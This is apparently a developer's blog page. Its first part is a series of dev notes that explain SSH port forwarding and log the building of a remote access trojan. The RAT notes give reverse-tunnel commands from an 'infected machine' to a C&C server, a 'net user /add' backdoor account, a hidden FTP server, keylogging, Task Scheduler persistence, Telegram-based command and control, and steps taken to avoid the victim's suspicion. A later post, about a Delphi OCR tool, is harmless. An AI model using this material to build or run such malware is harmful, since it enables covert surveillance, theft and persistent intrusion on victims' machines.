*HTTP requests are best learnt by emulating browsers and other HTTP clients such as PostMan, I've come to learn. i've been searching for the "proper" way to upload files via HTTP POST for the better part of the day. but no resource seems complete on the internet, not even the RFC2616. some of the headers I see in PostMan console/google chrome DevTools seemingly have no explanation. RFC2616 has only a passing mention of Content-Type: multipart/form-data for uploading files and the required fields in the HTTP request body between boundaries. scattered information here and there only add to the confusion and most SO threads just tell the OP's to STFU and use available HTTP libraries for the language they're using to upload files. anyway, I just gave up on trying to find a good complete HTTP resource for developers and just emulated PostMan's HTTP POST request. ofc that worked. i really was expecting more clarity on the topic. which fields are required for file upload? which headers? what's "content-disposition"? David Gourley's "HTTP: The Definitive Guide" talks about it in brief on page 326 comes close but it's not convincing. web searches on constructing raw HTTP request for file upload are mostly useless or very meagre/scattered.
*three-pass protocol in cryptography. commutative encryption. interesting. from https://www.youtube.com/watch?v=qWKK_PNHnnA
*DW Service new agent creation process is simple but misleading. group name is to be left unfilled for the first agent created since there's no groups in the beginning. they could've made that clear with a textbox hint. was banging my head over why i couldn't create a new agent. Jesus freakin Christ.
*https://www.dwservice.net->Free and Open Source remote control software. I'm conflicted over some kind of SSH client such as PuTTY or a full-fledged remote control software to include with the program. I need the ability to browse through the files and download/upload them. SSH requires the username and password of the device's account. so, thinking about going with a remote desktop solution sch as DW Service. https://www.dnsstuff.com/teamviewer-alternatives pointed me toward it. DW Service supports silent mode as well, https://www.dwservice.net/en/faq.html
*MUST HAVE ADMIN RIGHTS to run DW Agent
*Nevermind, DW Service only allows silent INSTALL. not silent mode. lol. so won't be using DW Service. i don't think any "legal" remote desktop software would allow such a thing.
*Command line redirections. nice stuff. i knew them. just not they were called that. lol. trace of this thought:
https://support.anydesk.com/Command_Line_Interface ->Uses pipe to direct info into application
https://ss64.com/->Cool website for help on command line
*I know there were hacks to make console VB6 apps back in the day but here it is anyway, the right resources are still there on the web to my surprise:
https://stackoverflow.com/questions/286924/how-do-i-build-a-vb6-console-app
http://vb.mvps.org/samples/Console/
http://www.mvps.org/st-software/api_usage.htm
http://www.vbforums.com/showthread.php?541443-StdIn-amp-StdOut-console-app
*Stumbled upon a great book by Matthew Curland on VB6: Advanced Visual Basic 6 Power techniques for everyday programs on libgen
*AnyDesk looks promising. Got command line interface. Can silent install with password for unattended access but the window will show. Tray icon shows. Could hack around with windows api to hide those but... too hacky for me. Feels too brittle. I Pass. Gives me an idea for the next project though. :P
*Google Chrome's software cleanup tool is making my system crawl. Second time it has done that. Uninstalling it. Firefox FTW!
*Learning a lot about SSH and reverse tunneling. Nice resources:
https://causeyourestuck.io/2016/04/17/reverse-shell/
https://causeyourestuck.io/2016/04/18/reverse-ssh-also-android/
https://unix.stackexchange.com/questions/46235/how-does-reverse-ssh-tunneling-work
https://serverfault.com/questions/888693/which-command-is-used-to-establish-ssh-tunnel-in-windows
https://www.howtogeek.com/428413/what-is-reverse-ssh-tunneling-and-how-to-use-it/
https://www.pugetsystems.com/labs/hpc/How-To-Use-SSH-Client-and-Server-on-Windows-10-1470/#sshfromWindows10toWindows10
*Linux Manjaro x64 doesn't work on VirtualBox. Installed Linux Mint x86 instead. Doing this for ssh server. OpenSSH does have a server for windows and windows 10 seems to have it as an optional feature but spare me the trouble. Just easier on linux.
*There's a lot of resource about SSH tunneling on the internet. But here's what I've learnt. What SSH does is allow encrypted connection to be established between two computers on the internet(or any network). The computer initiating the connection is the client. The one accepting is the server. Thus SSH has two components: client and server. The client computer runs the SSH client software and the server runs the SSH server software. Windows doesn't seem to be used much as an SSH server hence there's not much choice for SSH server softwares on Windows. There's lot more choices for the SSH client software though. PuTTY is one such SSH client. New versions of Windows 10 seem to have the OpenSSH client by default accessible through the command prompt using the command "ssh" similar to Linux. There's commercial SSH server softwares for windows but Windows 10 does seem to provide the free OpenSSH server software as an optional feature that can be manually enabled. It requires configurations to be made though. Tutorials are aplenty on the internet for that. For the purpose of learning about SSH, I used linux where both the client and the server softwares are either present by default or are trivial to get up and ready. On Linux Mint, the distro that I used, it was just one "apt-get install openssh" away. That installs both the client and the server software. First, here's how SSH is typically used, the straightforward way:
I've got a computer A that wants to access computer B. So, A is the client and B is the server according to our terminology. What one would do is run the SSH server program on computer B. This program keeps listening at the port 22(typically) of computer B for incoming connections and if any connection request is detected at the port, connection is established. Computer A has to install an SSH client software and try to make a connection with the SSH server of computer B. This is usually done as follows, where the SSH client program is invoked by the "ssh" command:
-->ssh usernameOfComputerB@IPaddressOfComputerB
The server running on computer B detects this connection request and asks the client for the password associated with the username of computer B. If you want to access computer B, then you better know the credentials of the machine, right?
If a valid password is given, computer A can access computer B with absolute authority. It's as if a portal is created from computer A to computer B. Using computer A, a user can control computer B.
But that's not all that interesting. What's so useful about SSH is its port forwarding ability. As https://www.ssh.com/ssh/tunneling/example describes,
'SSH port forwarding is a mechanism in SSH for tunneling application ports from the client machine to the server machine, or vice versa. It can be used for adding encryption to legacy applications, going through firewalls, and some system administrators and IT professionals use it for opening backdoors into the internal network from their home machines. It can also be abused by hackers and malware to open access from the Internet to the internal network.' There's two types of port forwarding in SSH: Local and Remote port forwarding. A nice description of typical situations where one would use these is given @ https://help.ubuntu.com/community/SSH/OpenSSH/PortForwarding.
Keep in mind that ssh is done from client computer into the server computer(where ssh server is running). SSH commands are issued on the client side. And port forwarding is done after the connection is established from client to the server though all of this may happen with just one line of command.
Ok, now, LOCAL forwarding works like this:
first your ssh client(computer A) establishes a connection with the specified ssh server(computer B):
______________________
A ______________________ B

then it sets up a listener locally (in computer A itself) at a port you specify. Any connection made to this port by other applications in computer A will be funnelled to computer B and output through another port you specify. In commandline, this is how it looks like:(remember, you run this from computer A i.e. client)
-->ssh usernameOfComputerB@IPaddressOfComputerB -L 8585:localhost:3232
The -L switch refers to local port forwarding. 8585 is the local port(in computer A). 3232 is the remote port(in computer B i.e. running SSH server). localhost represents the computer B. So the first port is the client-side(A's) port. The parts after that are the server side's parameters(B's). So, here, SSH server running on computer B is going to give what comes from the client port 8585 to the computer B(localhost, from the SSH server's perspective) through port 3232.
So, you ask any program running on A to connect to local port 8585 and it magically connects to B at port 3232 through the SSH tunnel. This can be useful for preventing any plaintext information from being intercepted in the middle since an SSH connection is, by nature encrypted, and any communication occuring through the proverbial tunnel created by the SSH connection is itself going to be encrypted. Simply ssh'ing into a server would allow us remote control (a shell, in networking lingo) over the server. But with port forwarding, any application can tunnel through the SSH connection to the server, like riding on a secure highway. Port forwarding affords secure connection to any application we want.
Another use case for local port forwarding would be, as described @ https://www.youtube.com/watch?v=AtuAdk4MwWw. Suppose you're at work and you'd like to remote desktop to your home computer. But your work network has a firewall that blocks remote desktop connections, targetting the port 3389. Under normal circumstances, your remote desktop client at work would use the local port 3389 for connecting into your home computer at its port 3389 and everything would work fine. But now, the firewall has blocked the port 3389 making the remote desktop application useless. Now, theoretically, changing the port the remote desktop app uses on both your work computer and home computer could work but it may not be practical or allowable or possible. What you could do however, if your home computer had an SSH server running, is set up a local port forward on your work computer with an SSH client to connect to your home computer's SSH server. Example, on your work computer:
-->ssh homePCusername@homePCipAddress -L 6565:localhost:3389
The part before -L:
This would make an SSH tunnel to your home computer.
Part after -L and including:
Forward the local port 6565 to your home computer(localhost is from POV of the SSH server)'s port 3389
The remote desktop application running on your home computer would see the remote desktop connection incoming at the right port: 3389, as it normally would. And voila! You're connected to your home through your remote desktop software! Despite the firewall rule.
Another example:
-->ssh compB@compBipAddr -L 9595:www.yahoo.com:80
Running the above on computer A would connect to the SSH server running on computer B and forward all local traffic targetted to port 9595 to www.yahoo.com at port 80 from computer B. So, going to localhost:9595 on a browser running on computer A would connect with yahoo.com at port 80(standard HTTP port) from computer B.
So, local port forwarding can be represented as a secure tunnel from client (A) to server (B):
\
   \________________
A ->________________-> B
   /
/
REMOTE forwarding:
This describes it best: https://www.ssh.com/ssh/tunneling/example.
The following command on computer A(client):
-->ssh usernameOfComputerB@IPaddressOfComputerB -R 8080:localhost:80
'..allows anyone on the computer B(running SSH server) to connect to port 8080 of the computer B. The connection will then be tunneled back to the client computer A, and the client then makes a connection to port 80 on localhost. Any other host name or IP address could be used instead of localhost to specify the host to connect to..'
So, the picture looks more like:
                    /
    ________________/
A <-________________ <- B
                    \
                    \
i.e. funnels data from SSH server computer B to SSH client computer A. Any connection on port 8080 of computer B would be pushed through the tunnel to computer A. But here's the important part, the command to do so is issued by the client A, as is consistent with the fact that commands are always issued by the client.
So, if you've got a client and a server, and if you can connect from client to server(firewalls and routers often don't allow this if the server sits behind one), you can redirect data from the specified port of the server to the client.
Now, a nice application of remote forwarding. First, forget the above figure.
This is the more interesting forwarding mode. See, usually firewalls are setup to allow outgoing connections but to block incoming connections on most ports. So, say we're at our home computer and we need a shell into our work computer running behind a firewall/router, we could install an SSH client there. From the work computer, we could establish a reverse shell to our home computer. Of course our home computer has to be reachable(not blocked by firewall/router) and running an SSH server. From our work computer:
-->ssh usernameOfHome@IPofHome -R 8787:localhost:22
The part before -R:
Establishes connection from work computer to home computer.
The part after -R:
Forwards home computer's port 8787 to work computer(localhost)'s port 22(SSH port).
So, any app on our home computer connecting to the local port 8787(local meaning home computer's) will be forwarded to the work computer at port 22. Now, if we also have an SSH server running on the work computer, we could directly SSH from our home computer to the work computer using the following command @ home computer:
-->ssh usernameOfWork@localhost -p 8787
The above command connects to the local port 8787 which is forwarded to the work computer's port 22 using username of the work computer. How neat is that?
So, now we have access from our home computer to our work computer which is behind a firewall/router through the SSH tunnel.
Note that 'localhost' in the first command(issued from work) refers to the work computer while in the second command(issued from home) refers to the home computer.
Now going back to our Purebasic RAT, if we could set up a reverse shell(remote forwarding) from the infected computer to our C&C computer, we could bypass the firewall shielding the infected computer. For this, the infected computer would have to use an SSH client to remote forward its port 22 as:
-->ssh usernameOfCnC@IPofCnC -R 8787:localhost:22
The CnC machine would need to be running an SSH server of course, and be reachable(not behind firewall/router). Then from the CnC machine, an SSH client could be used to get a shell back to the infected machine as:
-->ssh usernameOfInfected@localhost -p 8787
But of course this would mean running an SSH server in the infected machine which could be problematic. Setting up the server in windows could be a PITA. And there's the problem of getting the username and password of one of the user accounts in the infected machine. One could always do a "net user /add username password". But setting up the server looks daunting.
ALL of this is to access the infected machine's files. SO, if files are all we're after, we could just do a reverse SSH tunnel(from the infected machine using an SSH client there ofcourse) to our CnC. But expose not the port 22 but FTP's port 21.
-->ssh usernameOfCnC@IPofCnC -R 8787:localhost:21
Do keep in mind that the above command would be run from the infected machine using an SSH client there.
And we could run a hidden FTP server on that port (21) in the infected machine.
Then from our CnC computer running the SSH server, an FTP client such as FileZilla could be configured to connect to localhost @ 8787.
I've tried the above using FileZilla server and FileZilla client. It does work. But only kinda. Turns out, FTP uses two channels: command and data. FTP uses port 21 for the command channel but a random port above 1024 for data transfer. Good resource about it on the internet(search "Plain FTP through SSH tunnel"):
https://arstechnica.com/civis/viewtopic.php?t=697519
https://www.ftpgetter.com/ftp-ssh-tunnel.php
https://superuser.com/questions/1243806/piggyback-ftp-over-ssh-tunnel
Basically, what we're trying to do is use FTP through the SSH tunnel. It doesn't work because FTP uses random port for data transmission. FTP connection does happen, so can command transfers, but data transfer doesn't work.
SFTP, or SSH FTP requires SSH server running on the infected machine, and has got nothing to do with regular FTP. So, that's no good.
All in all, FTP through SSH tunnel isn't going to work. Look at this complexity: https://docstore.mik.ua/orelly/networking_2ndEd/ssh/ch11_02.htm
In any case, if you're the attacker running SSH server, you'll need to be reachable. You probably sit behind a router, like most people do, so you're going to have to configure your router to forward ports to your local IP. That isn't the case with me. I can't even access the router, much less configure a port forward. Obviously the infected machine is going to have to be assumed to be unreachable due to a router of its own. Firewall is no issue and can easily be circumvented, router is the problem.
*I wonder how TeamViewer and AnyDesk and other remote desktop applications work even through routers.
*https://superuser.com/questions/661749/how-exactly-does-a-remote-program-like-team-viewer-work
https://www.quora.com/How-does-TeamViewer-work
Turns out, TeamViewer uses their server as a relay. No open ports required.
*Running an SSH server on android phone using the carrier's mobile data plan isn't possible either. Turns out, mobile service providers don't give public IP to users. Meaning users are assigned private IPs using NAT gateways operated by the mobile service providers, much the same way a device behind a router is assigned private IPs.
https://android.stackexchange.com/questions/208972/can-any-computer-connect-to-a-ssh-server-running-on-an-android-phone-connected-t
*I'm moving on to adding keylogging feature to the RAT. I knew I had to use GetAsyncKeyState() and all worked well until I had to check for the CAPS LOCK toggle. I just couldn't think of a way to do it reliably with GetAsyncKeyState(). So, I turned to my sKeyLogger which was a program I made in VB6 back in 2015. I knew I hadn't used GetAsyncKeyState() for getting the keys there, I knew it was hook-based. But I was certain that I had used GetAsyncKeyState() to check the state of the non-character keys. However, I was wrong. Turns out I was using GetKeyState() for that. In fact, there was no sign of the GetAsyncKeyState() anywhere in the keylogging module of the program. And turns out GetKeyState() can be used for checking toggle status of keys such as CAPS LOCK and NUM LOCK and the like. The msdn documentation says as much. But what it also says is that the API is thread-specific. I had been under the impression that it wouldn't work for system-wide key detection. Turns out I was wrong. I don't know whether I knew what the significance of GetKeyState() was then but the keylogger did function very well. GetKeyState() works perfectly for checking the toggle states of toggle keys. To be honest I still ain't that sure why did works, because isn't it supposed to check the key state for just our process/thread? Why does it work system-wide? Check out https://www.codeproject.com/Messages/3410698/GetAsyncKeyState-and-GetKeyState-Solved.aspx. On first glance, the internet seems to have no clue, nor interest in this API and google searches seem to be drifting ever away from anything close to windows API.
*Man, not using the low level keyboard hook does force you to deal with lots of pesky edge cases. Dealing with single character repetitions was easy. But multiple keys may be repeated as well. Had to make an array for all simultaneously pressed keys and check on each iteration. Doing that was a headache yesterday evening through night. I dunno. My head just wasn't making sense of the same code I was staring at for the whole day. Seems simple enough this morning(4th May, 2020). Multiple character repetition frequency threshold has been successfully implemented. Things like this, realtime keypress events can be really hard to debug and make it work. The only thing you have to work with is theory of how things must be happening. Theorize how things must be going, how they should be going and implement it in code and pray it works.
*When the whole thing is built, it has often amazed me how on earth I made it. But everything starts from simple and builds up in complexity and functionality. That, I've learned is important to bear in mind lest you despair on the apparent erosion of your competence.
*Keys that are normally used by keeping pressed(long-pressed keys), such as arrow keys, control, alt, shift are a headache to capture. So, I won't record those.
*I realize, repeat threshold(repeatInMs variable) can be made arbitrarily high. After all, the program does catch unique keypresses without fail. How many people press and hold literal text? We don't even need to record the repetition. The threshold could be eliminated altogether. Consecutive repeats could be just be outright blocked without much harm. Hmm..
*You know what, I think recording the special keys such as Ctrl and Alt and arrow keys are gonna be required to maintain keylog readability. Just gonna have to record one event for any bunch of them so they don't repeat.
*If a variable of an outer scope is to be used inside procedures, the variable must be declared Global in PureBasic.
*Starting from PureBasic 5.4, all programs are unicode i.e. strings used in purebasic program source will be unicode strings and each character will use 2 bytes.
https://www.purebasic.com/documentation/reference/unicode.html
https://www.purebasic.fr/english/viewtopic.php?f=14&t=60171
So, windows api such as RegSetValueEx() will always be translated to RegSetValueExW() and thus the 'cbData' parameter of the function should not use Len(string) but sizeof(char)*Len(string) i.e. 2*Len(string). Lookup sizeof() compiler function in purebasic help file.
*HKLM or HKCU \Run entry doesn't work if the exe file prompts UAC for admin rights. If it doesn't, then the exe runs at startup alright, but without admin rights. Makes perfect sense. https://superuser.com/questions/238200/windows-7-autostart-with-admin-rights Probably the same reason I used task scheduler in sKeyLogger IIRC
*For persistence, creating a service in windows seems to be a PITA. So, skipping that. For startup (and some persistence) Task Scheduler will have to be used because our program will need admin rights(right now, for BlockInput(), maybe more later) and autorun capability(obviously). Creating a task purely using windows API seems to require additional C++ header files(mstask.h and taskschd.h) https://docs.microsoft.com/en-us/windows/win32/api/_taskschd/ Apparently, those are not very widely used headers. So, no support in PureBasic. I could optionally see which libraries these use(taskschd.lib, seems like from https://docs.microsoft.com/en-us/windows/win32/taskschd/weekly-trigger-example--c---) but I've guessed - taskschd.dll in system32. The exports don't make sense to me though. Anyway, I forego this attempt to create tasks using the API since everyone seems to be content with just using the task scheduler commandline utility schtasks.exe or be using the nice wrapper class that .NET apparently provides. It appears there was a reason I too used the schtasks method in vb6 in sKeyLogger. SMH. Google "Task scheduler commandline parameters": https://www.windowscentral.com/how-create-task-using-task-scheduler-command-prompt https://superuser.com/questions/299274/creating-scheduled-tasks-from-command-line-using-parameters or do "schtasks create /?" on command prompt
*Admin rights are required to delete a scheduled task but not to create one(except if you're creating a task with the HIGHEST runlevel i.e. /rl HIGHEST switch)
*The DataSection and IncludeBinary functionality of the PureBasic compiler is so handy. Wish all languages had this.
*While debugging the stub code in PureBasic IDE, unlike vb6, you can't just put the %stub-projectname%.exe file into the source folder and go on with your debugging. You use the handy CompilerIf directive to point to the correct executable as such:
currpath=ProgramFilename()
CompilerIf #PB_Compiler_Debugger
    currpath="C:\Users\s0ft\Desktop\PurebasicRAT\Client\server.exe"
CompilerEndIf
As you guessed it, currpath is replaced with the right executable path when debugging.
*Updating resource in exe files doesn't seem to be very well documented in msdn. Just check out the documentation on UpdateResource() API.
*Apparently, LoadLibrary() is also used to obtain handle to an exe file when using LoadResource() and FindResource(). Ref: https://www.codeproject.com/Articles/4945/UpdateResource ; https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya
*Writing and loading resource seems to be pretty easy/straightforward though, if you can explore around msdn a bit.
*I've noticed this thing with many windows API functions that most of the time you're just jumping through unnecessary hoops or rather the windows api makes you. Most often it's probably a side effect of the windows api's 'backward compatibility' virtue.
*So much of windows api documentation on msdn seems to be neglected as of now. There's always some kind of bad link whenever I'm looking up some function there.
*Doing two BeginUpdateResource()->UpdateResource()->EndUpdateResource() back to back results in unpredictable behavior of EndUpdateResource() for the second time. Sometimes it succeeds and sometimes it fails with an error of ERROR_OPEN_FAILED(error code 110). According to Hans Passant @ StackOverflow, "UpdateResource is quite troublesome..." ref : https://stackoverflow.com/questions/14378769/updateresource-no-error-but-resource-not-added-why . I carefully read the Remarks section of msdn documentation for EndUpdateResource() and I found "Before you call this function, make sure all file handles other than the one returned by BeginUpdateResource are closed." It's probably got something to do with this. Not a lot of talk on this error regarding resource updates on the internet at this time. Googling "error_open_failed endupdateresource" brings out only a couple of results: https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&uact=8&ved=2ahUKEwjn7I_GkaLpAhUQwzgGHVIdA2sQFjAAegQIARAB&url=https%3A%2F%2Fgithub.com%2Fdotnet%2Fruntime%2Fissues%2F3832&usg=AOvVaw15ZbkrD8P7nQvGytawnjRo
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&uact=8&ved=2ahUKEwjn7I_GkaLpAhUQwzgGHVIdA2sQFjABegQIBRAB&url=https%3A%2F%2Fgithub.com%2Fdotnet%2Fruntime%2Fissues%2F3831&usg=AOvVaw0Z79M5WZShJxofKYiS08CW
They guess it's an antivirus interfering with the api.
*WOW. They were right. It is the antivirus software interfering with the updateresource apis. When I disable my ESET Smart Security's real time protection, no errors! Consistently!
*Say you copy an exe file "trial.exe" from your Desktop folder to %tmp% and ShellExecute() it using the %tmp% path, all from another program "runner.exe" residing in your Desktop. The "trial.exe" program will assume the working directory of Desktop despite the fact that it's working from the %tmp% folder. This means if "trial.exe" creates any file without using absolute paths, the file will go to your Desktop folder! All this is if you don't specify the 'lpDirectory' parameter of ShellExecute(). To assign a working to the program being executed by this API, use the 'lpDirectory' parameter; in this case, it would have to be assigned %tmp% How had I not learnt of this until now? ref:http://forums.codeguru.com/showthread.php?283973-Shell-execute-a-program-but-change-it-s-working-directory
*Apparently, there's no readily available free, authentic, trusted tool in windows to force a system-wide HTTP/HTTPS redirect(system-wide proxy). At the time of this writing, there's Proxifier, which is a commercial program. There's also KKCap, which seems to be free but begs authenticity. A self-declared open-source alternative to Proxifier does exist in GitHub but it doesn't work. And of course Fiddler doesn't work for all processes if they don't care about the system's(internet explorer's) proxy settings. So, it appears there's no easy way to snoop on Purebasic RAT's traffic without reverse engineering its binary and stepping through the code(provided the bot API tokens are encrypted of course). If Telegram had used plain HTTP, which seems hilarious in this day and age, instead of HTTPS, it would have been another story; any popular network monitor program such as SmartSniff, WireShark, TCPDump etc would be able to see the network data interchange in plain sight. ref:
https://stackoverflow.com/questions/33862969/system-proxy-settings-being-ignored-by-apps
https://stackoverflow.com/questions/34637396/how-to-force-a-specific-process-to-use-a-proxy-for-network-communication
https://www.comparitech.com/net-admin/decrypt-ssl-with-wireshark/
*Running an exe file from the Task Scheduler without explicitly specifying the working directory("Start in directory") will default to the working directory for the exe file being set to system32. Learnt this the hard way. I think it's best to either a)Use absolute paths for file operations OR b)Set the executable path as the working directory(PureBasic has SetCurrentDirectory() for just that) right at the beginning of the program. I'm using the second option.
https://stackoverflow.com/questions/33698946/how-to-change-start-directory-of-an-scheduled-task-with-schtasks-exe-in-windows
*The greatest asset of a programming language is its userbase.
*Apparently, PureBasic has a StringByteLength() function. How would I have known this before.
*A possible debug black hole: since there's no native boolean type in PureBasic, we use the integer type for a boolean variable. But if you do not specify this type to a variable explicitly, you won't be able to apply boolean logic on it. Example:
------------------------
Define someBool.i=#True
If someBool
    ;executed
EndIf
------------------------
Define someBool=#True
If someBool
    ;not executed
EndIf
------------------------
*This is the first time I ever experienced this happen: the server was running but didn't respond to my commands. I sent out /info and /screenshot but nothing. I checked on the task manager and the process was there but it just didn't respond to the commands. I check with process explorer and normally I would see the server process spawn the conhost for task scheduling persistence but I didn't see that this time. There was no process activity. I suspected a hung network operation might be the culprit and thus disconnected my ethernet plug and boom! The conhost spawns were back. As soon as I plugged the cable back in, I got back the responses to the two pending commands in my Telegram chat with the bot. I am almost certain the HTTP functions in PureBasic don't timeout properly if at all. Gotta fix that. ref: http://forums.purebasic.com/english/viewtopic.php?f=3&t=72501
*Checking if a child process is running doesn't seem to be doable via CreateMutex(). So, I'm just gonna bank on the only-single-instance property of both the persistor and server to just spam RunProgram() at regular intervals for realtime persistence. But this approach seems to constantly change the cursor to busy and obviously anyone will be suspicious. Just gonna use GetExitCodeProcess(). ref
https://stackoverflow.com/questions/1591342/c-how-to-determine-if-a-windows-process-is-running
https://stackoverflow.com/questions/592256/fast-way-to-determine-if-a-pid-exists-on-windows
But alas! It doesn't work for monitoring the server process. This is because when the persistor executes the server executable from a random location, the server process will then install itself to the right installation directory and then run from there instead. Thus, the persistor program will have a bad Process ID, which no longer corresponds with the server process. Using most Inter Process Communication(IPC) requires knowledge of the process, which in the aforementioned case is a luxury we won't have. Other non-process specific IPC would require some mechanism to store state and a good protocol to decide a state change. So, I think making a window and searching for the title coupled with some kind of fail-safe is the simpler and the more effective way to go about this. That's probably how I used to do this in vb6.
*IPC in windows ref: https://www.drdobbs.com/windows/using-named-pipes-to-connect-a-gui-to-a/231903148
*https://app.diagrams.net/ for flowchart

Tuesday, April 21, 2020

Screen Text Finder

TL;DR
This is a program that lets you locate a search string on your screen. Performs OCR on your screenshot to achieve that. Download here. Be sure to have all the necessary .dll files and the eng.traineddata in the same folder as the executable.

The long version:
This is a project I did to teach myself Delphi. The reason for that is, well, a lot of leisure time in the time of a pandemic. But the substance of the why is, I wanted to know the only other language that offers a RAD (Rapid Application Development) environment apart from my good old VB6 and the cool new kid on the block C#. I could have done it in C# but I wanted a native executable. The old concern of the user not having .NET framework installed is no longer there, everyone's on Windows 10's bloat (pun intended), but being a VM-based language, I have noticed the binaries taking their time to load for the first time they are executed. Anyway, I wanted to see if Delphi could be my next go-to language for quick and dirty apps just as VB6 was in the good ole days around a decade ago. I had tried Delphi 7 back in the day (7-9 years ago) during the HackHound days, fun days. But it was nothing serious. I mostly used it for generating shellcodes and staring at other people's codes (steve10120, counterstrikewi and others) hoping to implement my own version in the one language I knew back then - you guesssed it, VB6. So, this time, I was determined to go through with it. This is why I chose Delphi. But then I had heard of another phenomenon in Pascal land - Lazarus.
Lazarus is an IDE based on the Free Pascal compiler that is supposed to be the free and open source alternative to Delphi. I tried it. To the credit of Lazarus' developers, the installer is pretty light and the installation is pretty quick and the IDE is snappy to open. So are the compiled binaries. But coming from Visual Studio, any IDE was going to have a hard time impressing me. I used to use CodeSmart by AxTools with VB6. It is an IDE plugin that allowed code completion, intellisense and all that good stuff modern IDEs have by default. And it was pretty helpful. The first time I got a hold of it was the last time I coded in VB6 without it back then. The point is, I've always done serious Windows Desktop development with great IDEs. All this to say, I was not impressed with Lazarus, at all.
I felt Lazarus to be clunky and glitchy and overall not very user-friendly. You can't call it a feature-rich IDE. I have no qualms with the Free Pascal Compiler (FPC) it uses though. Lazarus doesn't seem to have a definitive way of doing things. For, example, I couldn't use generics. Upon searching the freepascal forum, there was so much heat around the topic that I was thoroughly confused. I just gave up on it. The wiki/docs are user-friendly but extremely inadequate. And while Lazarus claims compatibility with Delphi code, I couldn't get the Tesseract library wrapper for Delphi (the tesseract*.pas files) to work no matter how hard I tried. Weird errors popped up when trying to call the Recognize method and that too, not consistently. Sometimes it worked, sometimes it didn't. Sometimes the error is 'External error ?' and sometimes it it 'SIGSEV' or some other garbage nonsense like that. I could not troubleshoot the issue for the life of me. There was no help online. On the topic of errors, I had issues with exception handling as well, in Lazarus; I dunno if that's the IDE or the debugger or whatever else there may be in there. In hindsight, after having completed the project in Delphi 10.3, I can see that the exe size was a bit smaller than the one Delphi produced but other than that, I don't miss anything (the Lazarus-generated executable seems to launch snappier though).
Okay, all that was why I left Lazarus. Now this is after I learned of Delphi releasing a completely free community version of their IDE : version 10.3. I downloaded and installed it. Noticeably larger download size and more time-consuming. The IDE is slower to open than Lazarus but as an IDE, Delphi is just better than Lazarus. The autocomplete and intellisense feel natural and quick unlike Lazarus' which takes like an hour to fetch suggestions. Also, there is an option for dark theme, easier on your eyes. The debugging experience is better. Not quite Visual Studio but definitely better than Lazarus. Now, the Delphi IDE is better than Lazarus but it still has its fair share of oddities and glitches. For example the toolbar layout resets if you hover over one of the menus. The object properties panel has serious sizing issues. Random view and layout resets for no good reasons are rampant. Some properties of VCL components are inconsistent and unreliable. For example, the FormStyle property set to fsStayOnTop doesn't work as intended. This is unlike say in C#, where as far as I can remember, the property works consistently wonderfully. And in VB6, a simple SetWindowPos with HWND_TOPMOST was all that was needed. But all in all, Delphi development is tolerable and workable.
Whew! That was something. I learnt a lot working on this project. The source can be found on the SRC branch and the binary on the BIN branch of the GitHub repo.

Now, my musings during development:

callbacks/pointers for procedural language, events/delegates for object oriented language
function/procedure for procedural language, methods for object oriented language
global variables for procedural language, interfaces for OOP language

delphi 10.3 community IDE that I'm using right now, is glitchy as well, but not as bad as Lazarus.
documentation/StackOverflow regarding the simplest of topics on Delphi is so hard to find online compared to say VB6 or C# or Java or Python or C or C++. every google search points to delphibasics.co.uk and that site seems to be down 99% of the time. I remember 'counterstrikewi' from HackHound and OpenSC back in the day and the site seems to be his?

TThread.Queue() in delphi == Dispatcher.BeginInvoke() in C#
TThread.Synchronize() in delphi == Dispatcher.Invoke() in C#
class method in delphi == static method of a class in C#

As a language, I think I like delphi/object pascal. Especially for windows desktop development, with delphi, I can talk to the OS more easily compared to say VB6. Calling windows api is a breeze. Function/procedure pointers are easy. Multiple compiler directives for low level stuff. Inline assembly support. A lot of low level stuff if one wants/needs to use it. All the while, I can also make use of pretty high level/abstractive stuff such as OOP and anonymous methods, for-in and generics and parallel/concurrent programming among, I'm sure, a lot of others I don't know yet. And the gem of it all, I get a RAD i.e. Rapid Application freakin' Development AKA drag and drop visual form design with A LOT of VCL form components; not to mention x64 bit support.

VB6 was fun and low level stuff could be done using all sorts of hacks. There was a great online community for that. The IDE was lightning fast and the executables produced were tiny ~20kB compared to ~2MB from delphi. The development process was result-oriented and very productive, and very quick I think now because I never knew what OOP was back then and VB6 didn't support it either (if I'm correct). With delphi, there's some great pluses and some cons. Anyway, it was great learning a new language with this project. And I totally get why one could consider it as a great, more productive, more readable alternative to C++.

Some areas where Delphi could improve, in my view, in descending order of significance:

Online community is not that great. Have to search harder for solutions to dev. related problems. Embarcadero docs most of the time prove inadequate, could use some code samples. Lazarus forum discussions are pretty basic and most of the time useless; the patronizing, self-aggrandizing members don't help - just shut up about how great Lazarus/FPC is. StackOverflow as always is great but not a lot of SO topics on delphi. Almost every google search points to delphibasics.co.uk which is dead.

The filesize is humongous. Gotta do something to trim all that unused VCL stuff.

Stay consistent through language revisions. Don't go around implementing breaking changes. It is confusing to newcomers especially given the lack of good online support for the language, cause you know, not a lot of users around.

IDE could use some improvements. Learn from Visual Studio. That is the gold standard IMHO.

CodeWorth